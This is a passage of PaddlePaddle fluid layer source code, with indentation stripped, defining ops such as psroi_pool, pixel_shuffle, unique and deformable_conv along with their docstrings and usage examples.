import numpy as np
def element_wise_add(x, y):
# LoDTensor must be actively converted to numpy array, otherwise,
# numpy.shape can't be used.
x = np.array(x)
y = np.array(y)
if x.shape != y.shape:
raise AssertionError("the shape of inputs must be the same!")
result = np.zeros(x.shape, dtype='int32')
for i in range(len(x)):
for j in range(len(x[0])):
result[i][j] = x[i][j] + y[i][j]
return result
def create_tmp_var(name, dtype, shape):
return fluid.default_main_program().current_block().create_var(
name=name, dtype=dtype, shape=shape)
def py_func_demo():
start_program = fluid.default_startup_program()
main_program = fluid.default_main_program()
# Input of the forward function
x = fluid.data(name='x', shape=[2,3], dtype='int32')
y = fluid.data(name='y', shape=[2,3], dtype='int32')
# Output of the forward function, name/dtype/shape must be specified
output = create_tmp_var('output','int32', [3,1])
# Multiple Variables should be passed in the form of tuple(Variable) or list[Variable]
fluid.layers.py_func(func=element_wise_add, x=[x,y], out=output)
exe=fluid.Executor(fluid.CPUPlace())
exe.run(start_program)
# Feed numpy array to main_program
input1 = np.random.randint(1, 10, size=[2,3], dtype='int32')
input2 = np.random.randint(1, 10, size=[2,3], dtype='int32')
out = exe.run(main_program,
feed={'x':input1, 'y':input2},
fetch_list=[output.name])
print("{0} + {1} = {2}".format(input1, input2, out))
py_func_demo()
# Reference output:
# [[5, 9, 9] + [[7, 8, 4] = [array([[12, 17, 13]
# [7, 5, 2]] [1, 3, 3]] [8, 8, 5]], dtype=int32)]
"""
helper = LayerHelper('py_func', **locals())
check_type(x, 'X', (list, tuple, Variable, type(None)), 'py_func')
if x is None:
x = []
elif isinstance(x, Variable):
x = [x]
elif isinstance(x, tuple):
x = list(x)
elif not isinstance(x, (list, tuple, Variable)):
raise TypeError('Input must be Variable/list(Variable)/tuple(Variable)')
check_type(out, 'Out', (list, tuple, Variable, type(None)), 'py_func')
if out is None:
out_list = []
elif isinstance(out, Variable):
out_list = [out]
elif isinstance(out, tuple):
out_list = list(out)
elif isinstance(out, list):
out_list = out
else:
raise TypeError(
'Output must be Variable/list(Variable)/tuple(Variable)')
fwd_func_id = PyFuncRegistry(func).id
bwd_func_id = PyFuncRegistry(
backward_func).id if backward_func is not None else -1
for each_out in out_list:
if len(each_out.shape) == 0:
raise ValueError(
'Output shapes of py_func op should be provided by users manually'
)
backward_skip_vars = set()
if backward_func is not None and skip_vars_in_backward_input is not None:
if isinstance(skip_vars_in_backward_input, Variable):
skip_vars_in_backward_input = [skip_vars_in_backward_input]
fwd_in_out = [v.name for v in x]
fwd_in_out.extend([v.name for v in out_list])
fwd_in_out = set(fwd_in_out)
backward_skip_vars = set()
for v in skip_vars_in_backward_input:
if not v.name in fwd_in_out:
raise ValueError(
'Variable {} is not found in forward inputs and outputs'
.format(v.name))
backward_skip_vars.add(v.name)
helper.append_op(
type='py_func',
inputs={'X': x},
outputs={'Out': out_list},
attrs={
'forward_callable_id': fwd_func_id,
'backward_callable_id': bwd_func_id,
'backward_skip_vars': list(backward_skip_vars)
})
return out
# For debug usage
py_func.registered_func = PyFuncRegistry.registered_func
py_func.registered_func_num = PyFuncRegistry.registered_func_num
@templatedoc()
def psroi_pool(input,
rois,
output_channels,
spatial_scale,
pooled_height,
pooled_width,
name=None):
"""
${comment}
Parameters:
input (Variable): ${x_comment}
rois (Variable): LoDTensor, ROIs (Regions of Interest) to pool over. It should be
a 2-D LoDTensor of shape (num_rois, 4), the lod level
is 1. Given as [[x1, y1, x2, y2], ...], (x1, y1) is
the top left coordinates, and (x2, y2) is the bottom
right coordinates. The data type is the same as `input`
output_channels (int): ${output_channels_comment}
spatial_scale (float): ${spatial_scale_comment} Default: 1.0
pooled_height (int): ${pooled_height_comment} Default: 1
pooled_width (int): ${pooled_width_comment} Default: 1
name(str, optional): The default value is None.
Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`
Returns:
${out_comment}.
Return Type:
Variable
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[100, 490, 28, 28], dtype='float32')
rois = fluid.data(name='rois', shape=[None, 4], lod_level=1, dtype='float32')
pool_out = fluid.layers.psroi_pool(x, rois, 10, 1.0, 7, 7)
"""
helper = LayerHelper('psroi_pool', **locals())
# check attrs
if not isinstance(output_channels, int):
raise TypeError("output_channels must be int type")
if not isinstance(spatial_scale, float):
raise TypeError("spatial_scale must be float type")
if not isinstance(pooled_height, int):
raise TypeError("pooled_height must be int type")
if not isinstance(pooled_width, int):
raise TypeError("pooled_width must be int type")
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='psroi_pool',
inputs={'X': input,
'ROIs': rois},
outputs={'Out': out},
attrs={
'output_channels': output_channels,
'spatial_scale': spatial_scale,
'pooled_height': pooled_height,
'pooled_width': pooled_width
})
return out
@templatedoc()
def prroi_pool(input,
rois,
spatial_scale=1.0,
pooled_height=1,
pooled_width=1,
batch_roi_nums=None,
name=None):
"""
The precise roi pooling implementation for paddle. Reference: https://arxiv.org/pdf/1807.11590.pdf
Args:
input (Variable): The input of precise roi pooling. The shape of the input tensor is
[N,C,H,W]. Where N is batch size,C is number of input channels,H
is height of the feature, and W is the width of the feature.
rois (Variable): ROIs (Regions of Interest) to pool over. It should be
a 2-D LoDTensor or Tensor of shape (num_rois, 4), the lod level
is 1 when it is LoDTensor. The LoD include the rois's batch index
information. If rois is Tensor, its batch index information should
be provided by batch_index.
Given as [[x1, y1, x2, y2], ...], (x1, y1) is
the top left coordinates, and (x2, y2) is the bottom
right coordinates.
spatial_scale (float): Ratio of input feature map height (or width) to raw image height (or width).
Equals the reciprocal of total stride in convolutional layers, Default: 1.0.
pooled_height (integer): The pooled output height. Default: 1.
pooled_width (integer): The pooled output width. Default: 1.
batch_roi_nums (Variable): The number of roi for each image in batch. It
should be 1-D Tensor, with shape [N] and dtype int64,
where N is the batch size. Default: None. Note: the lod of input should be
empty when batch_roi_nums has values.
name (str, default None): The name of this operation.
Returns:
Variable(Tensor): The shape of the returned Tensor is (N, C, pooled_height, pooled_width), with value type float32 or float16. N and C denote the batch_size and channels of the input respectively.
Examples:
.. code-block:: python
## prroi_pool without batch_roi_num
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[None, 490, 28, 28], dtype='float32')
rois = fluid.data(name='rois', shape=[None, 4], lod_level=1, dtype='float32')
pool_out = fluid.layers.prroi_pool(x, rois, 1.0, 7, 7)
## prroi_pool with batch_roi_num
batchsize=4
x2 = fluid.data(name='x2', shape=[batchsize, 490, 28, 28], dtype='float32')
rois2 = fluid.data(name='rois2', shape=[batchsize, 4], dtype='float32')
batch_rois_num = fluid.data(name='rois_nums', shape=[batchsize], dtype='int64')
pool_out2 = fluid.layers.prroi_pool(x2, rois2, 1.0, 7, 7, batch_roi_nums=batch_rois_num)
"""
helper = LayerHelper('prroi_pool', **locals())
# check attrs
if not isinstance(spatial_scale, float):
raise TypeError("spatial_scale must be float type")
if not isinstance(pooled_height, int):
raise TypeError("pooled_height must be int type")
if not isinstance(pooled_width, int):
raise TypeError("pooled_width must be int type")
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype)
inputs_op = {'X': input, 'ROIs': rois}
if batch_roi_nums is not None:
inputs_op['BatchRoINums'] = batch_roi_nums
helper.append_op(
type='prroi_pool',
inputs=inputs_op,
outputs={'Out': out},
attrs={
'spatial_scale': spatial_scale,
'pooled_height': pooled_height,
'pooled_width': pooled_width
})
return out
def pixel_shuffle(x, upscale_factor):
"""
This op rearranges elements in a tensor of shape [N, C, H, W]
to a tensor of shape [N, C/r**2, H*r, W*r].
This is useful for implementing efficient sub-pixel convolution
with a stride of 1/r.
Please refer to the paper: `Real-Time Single Image and Video Super-Resolution
Using an Efficient Sub-Pixel Convolutional Neural Network <https://arxiv.org/abs/1609.05158v2>`_ .
by Shi et al. (2016) for more details.
Parameters:
x(Variable): 4-D tensor, the data type should be float32 or float64.
upscale_factor(int): factor to increase spatial resolution.
Returns:
Out(Variable): Reshaped tensor according to the new dimension.
Raises:
ValueError: If the square of upscale_factor cannot divide the channels of input.
Examples:
.. code-block:: python
# declarative mode
import paddle.fluid as fluid
import numpy as np
input = fluid.data(name="input", shape=[2,9,4,4])
output = fluid.layers.pixel_shuffle(x=input, upscale_factor=3)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
input_data = np.random.rand(2,9,4,4).astype("float32")
output_data = exe.run(fluid.default_main_program(),
feed={"input":input_data},
fetch_list=[output],
return_numpy=True)
# print(output.shape)
# (2L, 1L, 12L, 12L)
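A numpy sketch of the rearrangement, assuming the common sub-pixel layout
(reshape, transpose, reshape); illustrative only, not the op implementation:

.. code-block:: python

    import numpy as np

    r = 3
    x_np = np.random.rand(2, 9, 4, 4).astype('float32')
    N, C, H, W = x_np.shape
    out_np = (x_np.reshape(N, C // (r * r), r, r, H, W)
                  .transpose(0, 1, 4, 2, 5, 3)
                  .reshape(N, C // (r * r), H * r, W * r))   # (2, 1, 12, 12)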
"""
helper = LayerHelper("pixel_shuffle", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
if not isinstance(upscale_factor, int):
raise TypeError("upscale factor must be int type")
helper.append_op(
type="pixel_shuffle",
inputs={"X": x},
outputs={"Out": out},
attrs={"upscale_factor": upscale_factor})
return out
def fsp_matrix(x, y):
"""
**FSP matrix op**
This op is used to calculate the flow of solution procedure (FSP) matrix of two 4-D Tensor feature maps.
Given feature map x with shape [x_channel, h, w] and feature map y with shape
[y_channel, h, w], we can get the fsp matrix of x and y in two steps:
1. reshape x into matrix with shape [x_channel, h * w] and reshape and
transpose y into matrix with shape [h * w, y_channel].
2. multiply x and y to get fsp matrix with shape [x_channel, y_channel].
The output is a batch of fsp matrices.
Args:
x (Variable): A 4-D Tensor feature map with shape [batch_size, x_channel, height, width].
A Tensor with type float32, float64.
y (Variable): A 4-D Tensor feature map with shape [batch_size, y_channel, height, width].
The y_channel can be different from the x_channel of Input(X)
while the other dimensions must be the same with Input(X)'s. A Tensor with
type float32, float64.
Returns:
fsp matrix (Variable): The output of FSP op with shape [batch_size, x_channel, y_channel].
The x_channel is the channel of x and the y_channel is the channel of y. A Tensor with
type float32, float64.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32])
feature_map_0 = fluid.layers.conv2d(data, num_filters=2,
filter_size=3)
feature_map_1 = fluid.layers.conv2d(feature_map_0, num_filters=2,
filter_size=1)
loss = fluid.layers.fsp_matrix(feature_map_0, feature_map_1)
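A numpy sketch of the two steps above; the normalization by h * w follows the
FSP paper and is an assumption here, so treat this as illustrative only:

.. code-block:: python

    import numpy as np

    b, cx, cy, h, w = 2, 3, 5, 8, 8
    x_np = np.random.rand(b, cx, h, w).astype('float32')
    y_np = np.random.rand(b, cy, h, w).astype('float32')
    x_flat = x_np.reshape(b, cx, h * w)                      # [b, x_channel, h*w]
    y_flat = y_np.reshape(b, cy, h * w).transpose(0, 2, 1)   # [b, h*w, y_channel]
    fsp_np = np.matmul(x_flat, y_flat) / (h * w)             # [b, x_channel, y_channel]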
"""
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'fsp_matrix')
check_variable_and_dtype(y, 'y', ['float32', 'float64'], 'fsp_matrix')
helper = LayerHelper('fsp_matrix', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype(
input_param_name='x'))
helper.append_op(type='fsp', inputs={'X': x, 'Y': y}, outputs={'Out': out})
return out
def continuous_value_model(input, cvm, use_cvm=True):
"""
**continuous_value_model layers**
Now, this OP is used in CTR projects to remove or transform the show and click values in :attr:`input`.
:attr:`input` is an embedding vector including show and click value, whose shape is :math:`[N, D]` (N is batch size. D is `2 + embedding dim` ).
Show and click occupy the first two dims of the embedding vector D.
If :attr:`use_cvm` is True, it will calculate :math:`log(show)` and :math:`log(click)` , and output shape is :math:`[N, D]` .
If :attr:`use_cvm` is False, it will remove show and click from :attr:`input` , and output shape is :math:`[N, D - 2]` .
:attr:`cvm` is show_click info, whose shape is :math:`[N, 2]` .
Args:
input (Variable): The input variable. A 2-D LoDTensor with shape :math:`[N, D]` , where N is the batch size, D is `2 + the embedding dim` . `lod level = 1` .
A Tensor with type float32, float64.
cvm (Variable): Show and click variable. A 2-D Tensor with shape :math:`[N, 2]` , where N is the batch size, 2 is show and click.
A Tensor with type float32, float64.
use_cvm (bool): Whether to use show_click. If True, the output dim is the same as the input's;
if False, the output dim is `input dim - 2` (show and click removed).
Returns:
Variable: A 2-D LoDTensor with shape :math:`[N, M]` . If :attr:`use_cvm` = True, M is equal to input dim D; if False, M is equal to `D - 2`. \
A Tensor with same type as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(name="input", shape=[64, 1], dtype="int64")
label = fluid.data(name="label", shape=[64, 1], dtype="int64")
embed = fluid.layers.embedding(
input=input,
size=[100, 11],
dtype='float32')
ones = fluid.layers.fill_constant_batch_size_like(input=label, shape=[-1, 1], dtype="int64", value=1)
show_clk = fluid.layers.cast(fluid.layers.concat([ones, label], axis=1), dtype='float32')
show_clk.stop_gradient = True
input_with_cvm = fluid.layers.continuous_value_model(embed, show_clk, True)
"""
helper = LayerHelper('cvm', **locals())
out = helper.create_variable(dtype=input.dtype)
helper.append_op(
type='cvm',
inputs={'X': [input],
'CVM': [cvm]},
outputs={'Y': [out]},
attrs={"use_cvm": use_cvm})
return out
def where(condition):
"""
Return an int64 tensor with rank 2, specifying the coordinates of the true elements in `condition`.
Args:
condition(Variable): A bool tensor with rank at least 1, the data type is bool.
Returns:
Variable, the output data type is int64: The tensor variable storing a 2-D tensor, which contains all the coordinates.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle.fluid.layers as layers
import numpy as np
# condition is a tensor [True, False, True]
condition = layers.assign(np.array([1, 0, 1], dtype='int32'))
condition = layers.cast(condition, 'bool')
out = layers.where(condition) # [[0], [2]]
# condition is a tensor [[True, False], [False, True]]
condition = layers.assign(np.array([[1, 0], [0, 1]], dtype='int32'))
condition = layers.cast(condition, 'bool')
out = layers.where(condition) # [[0, 0], [1, 1]]
# condition is a tensor [False, False, False]
condition = layers.assign(np.array([0, 0, 0], dtype='int32'))
condition = layers.cast(condition, 'bool')
out = layers.where(condition) # [[]]
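For reference, numpy's argwhere yields the same coordinates for the cases above:

.. code-block:: python

    import numpy as np

    np.argwhere(np.array([True, False, True]))              # [[0], [2]]
    np.argwhere(np.array([[True, False], [False, True]]))   # [[0, 0], [1, 1]]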
"""
check_variable_and_dtype(condition, "condition", ['bool'], "where")
helper = LayerHelper("where_index", **locals())
out = helper.create_variable_for_type_inference(
dtype=core.VarDesc.VarType.INT64)
helper.append_op(
type='where_index',
inputs={'Condition': condition},
outputs={'Out': [out]})
return out
def sign(x):
"""
This OP returns sign of every element in `x`: 1 for positive, -1 for negative and 0 for zero.
Args:
x(Variable|numpy.ndarray): The input variable could be N-D tensor or N-D numpy array, \
the input data type is float32 or float64.
Returns:
Variable, the output data type is the same as input data type. : The output sign tensor with identical shape to input :attr:`x`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# [1.0, 0.0, -1.0]
data = fluid.layers.sign(np.array([3.0, 0.0, -2.0], dtype='float32'))
"""
helper = LayerHelper("sign", **locals())
check_type(x, 'x', (Variable, np.ndarray), 'sign')
if isinstance(x, np.ndarray):
x = assign(x)
check_dtype(x.dtype, 'x', ['float16', 'float32', 'float64'], 'sign')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(type='sign', inputs={'X': [x]}, outputs={'Out': [out]})
return out
def unique(x, dtype='int32'):
"""
**unique**
Return a unique tensor for `x` and an index tensor pointing to this unique tensor.
Args:
x(Variable): A 1-D input tensor.
dtype(np.dtype|core.VarDesc.VarType|str): The type of index tensor: int32, int64.
Returns:
tuple: (out, index). `out` is the unique tensor for `x`, with identical dtype to `x`, and \
`index` is an index tensor pointing to `out`, by which user can recover the original `x` tensor.
Examples:
.. code-block:: python
import numpy as np
import paddle.fluid as fluid
x = fluid.layers.assign(np.array([2, 3, 3, 1, 5, 3], dtype='int32'))
out, index = fluid.layers.unique(x) # out is [2, 3, 1, 5]; index is [0, 1, 1, 2, 3, 1]
"""
check_variable_and_dtype(x, "x", ['float32', 'float64', 'int32', 'int64'],
"unique")
helper = LayerHelper("unique", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
index = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='unique',
inputs={'X': x},
attrs={'dtype': convert_np_dtype_to_dtype_(dtype)},
outputs={'Out': [out],
'Index': [index]})
return out, index
def unique_with_counts(x, dtype='int32'):
"""
This OP returns a unique tensor for `x`, a count tensor giving the count of each unique element in the raw input, \
and an index tensor pointing to this unique tensor.
**NOTICE**: This op support the variable type of Tensor only.
Args:
x(Variable): A 1-D input tensor with input shape of :math:`[N]` , the input data type is float32, float64, int32, int64.
dtype(np.dtype|core.VarDesc.VarType|str): The type of count and index tensor, it could be int32, int64. Default value is int32.
Returns:
tuple: (out, index, count), and the variable type in the tuple is Tensor. :attr:`out` is the unique tensor for input :attr:`x` and has the same data type as :attr:`x`; \
its shape is :math:`[K]`, where `K` may differ from the `N` in the shape of :attr:`x`. :attr:`index` is an index tensor pointing \
to :attr:`out`, with shape :math:`[N]`, the same as input :attr:`x`. :attr:`count` is the count of each unique element in \
:attr:`x`, with shape :math:`[K]`, the same as output :attr:`out`. The data type of :attr:`index` and :attr:`count` is int32 or int64.
Examples:
.. code-block:: python
import numpy as np
import paddle.fluid as fluid
x = fluid.layers.assign(np.array([2, 3, 3, 1, 5, 3], dtype='int32'))
out, index, count = fluid.layers.unique_with_counts(x) # out is [2, 3, 1, 5]; index is [0, 1, 1, 2, 3, 1]
# count is [1, 3, 1, 1]
# x.shape=(6,) out.shape=(4,), index.shape=(6,), count.shape=(4,)
"""
check_variable_and_dtype(x, "x", ['float32', 'float64', 'int32', 'int64'],
"unique_with_counts")
if not (dtype == 'int32' or dtype == 'int64'):
raise TypeError(
"Op unique_with_counts, index dtype must be int32 or int64")
if x is None or len(x.shape) != 1:
raise ValueError(
"Op unique_with_counts, x must not be null and size of dim must be 1"
)
helper = LayerHelper("unique_with_counts", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
index = helper.create_variable_for_type_inference(dtype)
count = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='unique_with_counts',
inputs={'X': x},
attrs={'dtype': convert_np_dtype_to_dtype_(dtype)},
outputs={'Out': [out],
'Index': [index],
'Count': [count]})
return out, index, count
def deformable_conv(input,
offset,
mask,
num_filters,
filter_size,
stride=1,
padding=0,
dilation=1,
groups=None,
deformable_groups=None,
im2col_step=None,
param_attr=None,
bias_attr=None,
modulated=True,
name=None):
"""
**Deformable Convolution op**
Compute 2-D deformable convolution on 4-D input.
Given input image x, output feature map y, the deformable convolution operation can be expressed as follow:
Deformable Convolution v2:
.. math::
y(p) = \sum_{k=1}^{K}{w_k * x(p + p_k + \Delta p_k) * \Delta m_k}
Deformable Convolution v1:
.. math::
y(p) = \sum_{k=1}^{K}{w_k * x(p + p_k + \Delta p_k)}
Where :math:`\Delta p_k` and :math:`\Delta m_k` are the learnable offset and modulation scalar for the k-th location,
where :math:`\Delta m_k` is 1 in deformable convolution v1. Please refer to `Deformable ConvNets v2: More Deformable, Better Results
<https://arxiv.org/abs/1811.11168v2>`_ and `Deformable Convolutional Networks <https://arxiv.org/abs/1703.06211>`_.
Example:
- Input:
Input shape: :math:`(N, C_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{out}, C_{in}, H_f, W_f)`
Offset shape: :math:`(N, 2 * deformable\_groups * H_f * W_f, H_{in}, W_{in})`
Mask shape: :math:`(N, deformable\_groups * H_f * W_f, H_{in}, W_{in})`
- Output:
Output shape: :math:`(N, C_{out}, H_{out}, W_{out})`
Where
.. math::
H_{out}&= \\frac{(H_{in} + 2 * paddings[0] - (dilations[0] * (H_f - 1) + 1))}{strides[0]} + 1 \\\\
W_{out}&= \\frac{(W_{in} + 2 * paddings[1] - (dilations[1] * (W_f - 1) + 1))}{strides[1]} + 1
Args:
input (Variable): The input image with [N, C, H, W] format. A Tensor with type
float32, float64.
offset (Variable): The input coordinate offset of deformable convolution layer.
A Tensor with type float32, float64.
mask (Variable, Optional): The input mask of deformable convolution layer.
A Tensor with type float32, float64. It should be None when you use
deformable convolution v1.
num_filters(int): The number of filters. It is the same as the number of output
image channels.
filter_size (int|tuple): The filter size. If filter_size is a tuple,
it must contain two integers, (filter_size_H, filter_size_W).
Otherwise, the filter will be a square.
stride (int|tuple): The stride size. If stride is a tuple, it must
contain two integers, (stride_H, stride_W). Otherwise, the
stride_H = stride_W = stride. Default: stride = 1.
padding (int|tuple): The padding size. If padding is a tuple, it must
contain two integers, (padding_H, padding_W). Otherwise, the
padding_H = padding_W = padding. Default: padding = 0.
dilation (int|tuple): The dilation size. If dilation is a tuple, it must
contain two integers, (dilation_H, dilation_W). Otherwise, the
dilation_H = dilation_W = dilation. Default: dilation = 1.
groups (int): The groups number of the deformable conv layer. According to
grouped convolution in Alex Krizhevsky's Deep CNN paper: when group=2,
the first half of the filters is only connected to the first half
of the input channels, while the second half of the filters is only
connected to the second half of the input channels. Default: groups=1.
deformable_groups (int): The number of deformable group partitions.
Default: deformable_groups = 1.
im2col_step (int): Maximum number of images per im2col computation;
The total batch size should be divisible by this value or smaller
than this value; if you face an out-of-memory problem, you can try
to use a smaller value here.
Default: im2col_step = 64.
param_attr (ParamAttr, Optional): The parameter attribute for learnable parameters/weights
of deformable conv. If it is set to None or one attribute of ParamAttr,
deformable conv will create ParamAttr as param_attr.
If the Initializer of the param_attr is not set, the parameter is
initialized with :math:`Normal(0.0, std)`, and the
:math:`std` is :math:`(\\frac{2.0 }{filter\_elem\_num})^{0.5}`. Default: None.
bias_attr (ParamAttr|bool, Optional): The parameter attribute for the bias of
deformable conv layer. If it is set to False, no bias will be added
to the output units. If it is set to None or one attribute of ParamAttr, conv2d
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
modulated (bool): Which version to use, v1 or v2; v2 is \
used when True. Default: True.
name(str, Optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Returns:
Variable: The tensor variable storing the deformable convolution \
result. A Tensor with type float32, float64.
Raises:
ValueError: If the shapes of input, filter_size, stride, padding and
groups mismatch.
Examples:
.. code-block:: python
#deformable conv v2:
import paddle.fluid as fluid
C_in, H_in, W_in = 3, 32, 32
filter_size, deformable_groups = 3, 1
data = fluid.data(name='data', shape=[None, C_in, H_in, W_in], dtype='float32')
offset = fluid.data(name='offset', shape=[None, 2*deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
mask = fluid.data(name='mask', shape=[None, deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
out = fluid.layers.deformable_conv(input=data, offset=offset, mask=mask,
num_filters=2, filter_size=filter_size, padding=1, modulated=True)
#deformable conv v1:
import paddle.fluid as fluid
C_in, H_in, W_in = 3, 32, 32
filter_size, deformable_groups = 3, 1
data = fluid.data(name='data', shape=[None, C_in, H_in, W_in], dtype='float32')
offset = fluid.data(name='offset', shape=[None, 2*deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
out = fluid.layers.deformable_conv(input=data, offset=offset, mask=None,
num_filters=2, filter_size=filter_size, padding=1, modulated=False)
"""
check_variable_and_dtype(input, "input", ['float32', 'float64'],
'deformable_conv')
check_variable_and_dtype(offset, "offset", ['float32', 'float64'],
'deformable_conv')
check_type(mask, 'mask', (Variable, type(None)), 'deformable_conv')
num_channels = input.shape[1]
assert param_attr is not False, "param_attr should not be False here."
helper = LayerHelper('deformable_conv', **locals())
dtype = helper.input_dtype()
if not isinstance(input, Variable):
raise TypeError("Input of deformable_conv must be Variable")
if not isinstance(offset, Variable):
raise TypeError("Input Offset of deformable_conv must be Variable")
if groups is None:
num_filter_channels = num_channels
else:
if num_channels % groups != 0:
raise ValueError("num_channels must be divisible by groups.")
num_filter_channels = num_channels // groups
filter_size = utils.convert_to_list(filter_size, 2, 'filter_size')
stride = utils.convert_to_list(stride, 2, 'stride')
padding = utils.convert_to_list(padding, 2, 'padding')
dilation = utils.convert_to_list(dilation, 2, 'dilation')
input_shape = input.shape
filter_shape = [num_filters, int(num_filter_channels)] + filter_size
def _get_default_param_initializer():
filter_elem_num = filter_size[0] * filter_size[1] * num_channels
std = (2.0 / filter_elem_num)**0.5
return Normal(0.0, std, 0)
filter_param = helper.create_parameter(
attr=helper.param_attr,
shape=filter_shape,
dtype=dtype,
default_initializer=_get_default_param_initializer())
pre_bias = helper.create_variable_for_type_inference(dtype)
if modulated:
helper.append_op(
type='deformable_conv',
inputs={
'Input': input,
'Filter': filter_param,
'Offset': offset,
'Mask': mask,
},
outputs={"Output": pre_bias},
attrs={
'strides': stride,
'paddings': padding,
'dilations': dilation,
'groups': groups,
'deformable_groups': deformable_groups,
'im2col_step': im2col_step,
})
else:
helper.append_op(
type='deformable_conv_v1',
inputs={
'Input': input,
'Filter': filter_param,
'Offset': offset,
},
outputs={"Output": pre_bias},
attrs={
'strides': stride,
'paddings': padding,
'dilations': dilation,
'groups': groups,
'deformable_groups': deformable_groups,
'im2col_step': im2col_step,
})
output = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
return output
def unfold(x, kernel_sizes, strides=1, paddings=0, dilations=1, name=None):
"""
This op returns a col buffer of sliding local blocks of input x, also known
as im2col for batched 2D image tensors. For each block under the convolution filter,
all elements will be rearranged as a column. While the convolution filter slides over
the input feature map, a series of such columns will be formed.
For each input :math:`x` with shape [N, C, H, W], the output shape [N, Cout, Lout]
can be calculated as following.
.. math::
dkernel[0] &= dilations[0] \\times (kernel\_sizes[0] - 1) + 1
dkernel[1] &= dilations[1] \\times (kernel\_sizes[1] - 1) + 1
hout &= \\frac{H + paddings[0] + paddings[2] - dkernel[0]}{strides[0]} + 1
wout &= \\frac{W + paddings[1] + paddings[3] - dkernel[1]}{strides[1]} + 1
Cout &= C \\times kernel\_sizes[0] \\times kernel\_sizes[1]
Lout &= hout \\times wout
Parameters:
x(Variable): 4-D Tensor, input tensor of format [N, C, H, W],
data type can be float32 or float64
kernel_sizes(int|list): The size of convolution kernel, should be [k_h, k_w]
or an integer k treated as [k, k].
strides(int|list): The strides, should be [stride_h, stride_w]
or an integer stride treated as [stride, stride].
For default, strides will be [1, 1].
paddings(int|list): The paddings of each dimension, should be
[padding_top, padding_left, padding_bottom, padding_right]
or [padding_h, padding_w] or an integer padding.
If [padding_h, padding_w] was given, it will be expanded to
[padding_h, padding_w, padding_h, padding_w]. If an integer
padding was given, [padding, padding, padding, padding] will
be used. For default, paddings will be [0, 0, 0, 0]
dilations(int|list): the dilations of convolution kernel, should be
[dilation_h, dilation_w], or an integer dilation treated as
[dilation, dilation]. For default, it will be [1, 1].
name(str, optional): The default value is None.
Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`
Returns:
The tensor variable corresponding to the sliding local blocks.
The output shape is [N, Cout, Lout] as described above.
Cout is the total number of values within each block,
and Lout is the total number of such blocks.
The data type of output is the same as the input :math:`x`
Return Type:
Variable
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name = 'data', shape = [100, 3, 224, 224], dtype = 'float32')
y = fluid.layers.unfold(x, [3, 3], 1, 1, 1)
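A quick sanity check of the output shape formula for the example above
(kernel 3x3, stride 1, padding 1, dilation 1):

.. code-block:: python

    C, H, W = 3, 224, 224
    k, s, p, d = [3, 3], [1, 1], [1, 1, 1, 1], [1, 1]
    dk = [d[i] * (k[i] - 1) + 1 for i in range(2)]       # effective kernel: [3, 3]
    hout = (H + p[0] + p[2] - dk[0]) // s[0] + 1         # 224
    wout = (W + p[1] + p[3] - dk[1]) // s[1] + 1         # 224
    Cout, Lout = C * k[0] * k[1], hout * wout            # 27, 50176
    # so y.shape == [100, 27, 50176]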
"""
helper = LayerHelper("unfold", **locals())
assert len(x.shape) == 4, \
"input should be the format of [N, C, H, W]"
if isinstance(kernel_sizes, int):
kernel_sizes = [kernel_sizes, kernel_sizes]
else:
assert isinstance(kernel_sizes, list) and (len(kernel_sizes) == 2), \
"kernel_sizes should either be an integer or a list of two integers"
if isinstance(strides, int):
strides = [strides, strides]
else:
assert isinstance(strides, list) and (len(strides) == 2), \
"strides should either be an integer or a list of two integers"
if isinstance(dilations, int):
dilations = [dilations, dilations]
else:
assert isinstance(dilations, list) and (len(dilations) == 2), \
"dilations should either be an integer or a list of two integers"
if isinstance(paddings, int):
paddings = [paddings] * 4
elif isinstance(paddings, list):
if len(paddings) == 2:
paddings = paddings * 2
elif len(paddings) == 4:
pass
else:
raise ValueError(
"paddings should either be an integer or a list of 2 or 4 integers"
)
else:
raise ValueError(
"Unexpected type of paddings, it should be either an integer or a list"
"of 2 or 4 integers")
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="unfold",
inputs={"X": x},
outputs={"Y": out},
attrs={
"kernel_sizes": kernel_sizes,
"strides": strides,
"paddings": paddings,
"dilations": dilations
})
return out
def deformable_roi_pooling(input,
rois,
trans,
no_trans=False,
spatial_scale=1.0,
group_size=[1, 1],
pooled_height=1,
pooled_width=1,
part_size=None,
sample_per_part=1,
trans_std=0.1,
position_sensitive=False,
name=None):
"""
Deformable ROI Pooling Layer
Performs deformable region-of-interest pooling on inputs. As described
in `Deformable Convolutional Networks <https://arxiv.org/abs/1703.06211>`_, it gets an offset for each bin after
roi pooling so that pooling is performed at the correct region. The batch size will change to the number of region bounding boxes after deformable_roi_pooling.
The operation has three steps:
1. Dividing each region proposal into equal-sized sections with the pooled_width and pooled_height.
2. Add offsets to the pixels in the ROI to get new locations, and compute the new values directly through
